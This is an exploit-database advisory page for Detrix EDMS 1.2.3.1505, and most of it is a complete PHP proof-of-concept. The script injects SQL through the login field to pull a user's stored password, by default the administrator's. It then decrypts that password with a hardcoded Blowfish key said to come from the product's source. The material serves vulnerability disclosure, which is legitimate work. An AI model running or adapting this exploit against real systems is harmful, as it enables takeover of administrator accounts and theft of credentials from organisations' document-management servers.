Detrix EDMS 1.2.3.1505 SQL Injection

2019.10.03
Credit: Burov Konstantin
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/php /* # Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit # Google Dork: # Date: Jul 2019 # Exploit Author: Burov Konstantin # Vendor Homepage: forum.detrix.kz # Software Link: https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb # Version: any # Tested on: Detrix 1.2.3.1505 */ <?php /*---------------------------CHANGE-ME--------------------------------*/ $URL = "http://192.168.56.6"; // Set URL for the target host $user_id = 0; // 0 - Default admin ID /*--------------------------------------------------------------------*/ $banner = "Exploiting SQLi vuln and password decrypting for Detrix\n". "http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n". "sad.2.shade@mail.com, 2019.\n\n"; // SQLi request $sql_req = "login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ". "CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR". "DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ". "AS NUMERIC) AND 'a'='a"; $data = array('password' => 'pass', 'login' => $sql_req); $options = array( 'http' => array( 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data) ) ); // Key from %detrix%/system/utils/MSF_string.php $sSuperDuperSecretKey = "!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@"; echo $banner; try { $context = stream_context_create($options); echo "Send SQLi to $URL...\n"; $result = file_get_contents($URL, false, $context); } catch (Exception $e) { echo 'Error: ', $e->getMessage(), "\n"; } if ($result != "") { if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) { $clear_pass = trim( openssl_decrypt(base64_decode($encrypted_pass[1]), "BF-ECB", $sSuperDuperSecretKey, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING) ); // Decrypt pass echo "Pass for User id $user_id: $clear_pass \n"; } else echo "Error: no such User id:$user_id or empty password!\n"; } else echo "Error: empty Response or error!\n" ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top